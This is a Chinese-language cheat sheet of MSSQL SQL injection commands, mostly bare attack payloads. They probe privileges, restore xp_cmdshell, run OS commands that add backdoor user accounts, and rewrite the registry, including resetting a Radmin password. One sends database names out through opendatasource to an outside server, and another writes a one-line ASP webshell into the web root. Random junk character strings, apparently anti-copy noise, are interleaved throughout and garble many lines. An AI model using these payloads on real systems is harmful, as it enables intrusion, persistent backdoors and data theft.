常用的一些注入命令

admin

//看看是什么权限的
- m! o3 O. a0 K" C2 E" a: x9 band 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
- m, O7 R9 }. n; a0 ~: Land 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
+ l" w! y# Y6 j
5 z8 ^& ^' B; I
数字类型
and char(124)%2Buser%2Bchar(124)=0
- q1 M4 s! Q8 E7 d; ?9 |
字符类型
8 t$ Z9 M  R0 m6 o* ]; Q' and char(124)%2Buser%2Bchar(124)=0 and ''='
" l( k+ f( O$ C4 B. P( @! r
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
+ Z, y( D9 v% z3 ^0 v; s7 m
, i) s" c' @" g& `爆用户名
and user>0
' and user>0 and ''='

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
$ B1 N8 U+ j& ~1 v3 TAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
( u" R! @; z1 F: R4 J
检测是不是MSSQL数据库
and exists (select * from sysobjects);--

/ T: K% k1 M5 g. g检测是否支持多行
;declare @d int;--

% I4 U. I* L& Q) P" T! d恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


) W. P- v/ X0 f9 v3 oselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
# M: R! Y# y+ L* }' E1 t
//-----------------------
//       执行命令
//-----------------------
首先开启沙盘模式：
/ O% M1 \  L( j( oexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
0 A5 v* S; x9 ~' C1 ?
: t# B) b+ O: t, }然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
- d' P# p; ^$ ?2 ^( v; s, k3 n
执行命令
/ ?. i# G$ Z; i;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

6 w# @# V; |7 \EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
" t1 Y7 {9 H% N' D2 r9 T0 ihttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
: Z1 Y( [9 D7 B/ Z4 J1 Q0 Q) ^
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

3 y7 [; @! n1 WREG_SZ

4 A* I2 X7 F1 [" O7 e读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
$ t1 |3 m) D! W) b3 w$ ]8 q' Z* |exec master..xp_dirtree 'c:\winnt\system32\',1,1
, h+ m8 B5 h( P% i- X+ M

数据库备份
backup database pubs to disk = 'c:\123.bak'

//爆出长度
: c, i" r6 X* c0 fAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
8 w4 W- m7 J0 p8 F% A+ u& O, Y
2 C  H1 o, J: O2 ^

0 ~) G! I( i  }. {, _更改sa口令方法：用sql综合利用工具连接后，执行命令：
' V3 L! B  ~' Z3 s; J* @2 l/ nexec sp_password NULL,'新密码','sa'

, W2 W% ^8 o7 ?( L2 t. `+ u$ R添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,9530772
. ~* |- G( x5 j. dexec master.dbo.sp_addsrvrolemember test,sysadmin

7 \/ S# ]+ ], v# u删除扩展存储过过程xp_cmdshell的语句:
8 a7 E5 ~" q4 G- Cexec sp_dropextendedproc 'xp_cmdshell'

2 [1 Z& d* w- c+ d( Y# p8 ~添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
; a9 A1 t5 r& m( }$ {, p' h2 LGRANT exec On xp_proxiedadata TO public
' ]# K; B/ o4 t9 Y% f/ S
# m+ V4 m3 x* d$ s
停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
, m) ?7 |% e5 s2 jxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
/ I. i( f/ q6 ~( Z4 N0 l
dbo.xp_makecab

5 i2 D7 \4 Z6 e7 V3 g将目标多个档案压缩到某个目标档案之内。
, t4 L, C$ y& ~- d5 @所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

7 s1 A" j- D$ a1 Udbo.xp_makecab
'c:\test.cab','mszip',1,
' |/ z2 i! o0 I: q6 K'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process
" H6 Q5 `! y" @& f+ f3 y2 ~
& z( l5 R) @5 }# L/ O9 p' ^* A停掉某个执行中的程序，但赋予的参数是 Process ID。
- k. }7 ~# I1 u, n) _利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
8 i- O$ u# F# Y8 ]8 a4 X
* u% T" G6 F' N5 l1 T# ?xp_terminate_process 2484
/ z, K( L, |- W7 H# R
xp_unpackcab

% V* Q: q+ ]$ Y- l解开压缩档。
+ E! \& o) e9 w" j, |
  k4 ~# ]9 |3 N- `+ {2 yxp_unpackcab 'c:\test.cab','c:\temp',1
& c# m$ |( U+ Z5 J& u# j9 w  O4 |
0 g3 _- n" b/ [8 Y
, k+ g* a$ |3 i, m$ h, x某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

& J# J& K, t! O! \, jcreate database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
9 O" ~$ {! W) N) X7 X$ L
1 j/ u$ ~( B; ^7 S- H; L//得到数据库名
) s! v7 j4 a+ w6 yinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

) E7 [, Y; }1 E) D5 y" l
% X3 @' f7 m8 r4 P- ~; d0 ]//在Master中创建表，看看权限怎样
/ A$ R5 Z4 F; wCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
- T9 m& e$ K7 y& x
% W/ ]4 `8 [! x" h, j4 F' z* \: C用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
1 k- v0 R; i2 w; C7 |$ M
8 p3 l- f* R% H: |/ w! Q( o$ Z//更新表内容
% N9 H  U" \6 v4 N  ?7 H7 zUpdate films SET kind = 'Dramatic' Where id = 123
* O2 H( v1 |9 h2 V) P+ @
+ ]9 a3 i; ?7 ]+ ^//删除内容
1 ?+ w& Z4 q: l8 K/ Q1 }# C- edelete from table_name where Stockid = 3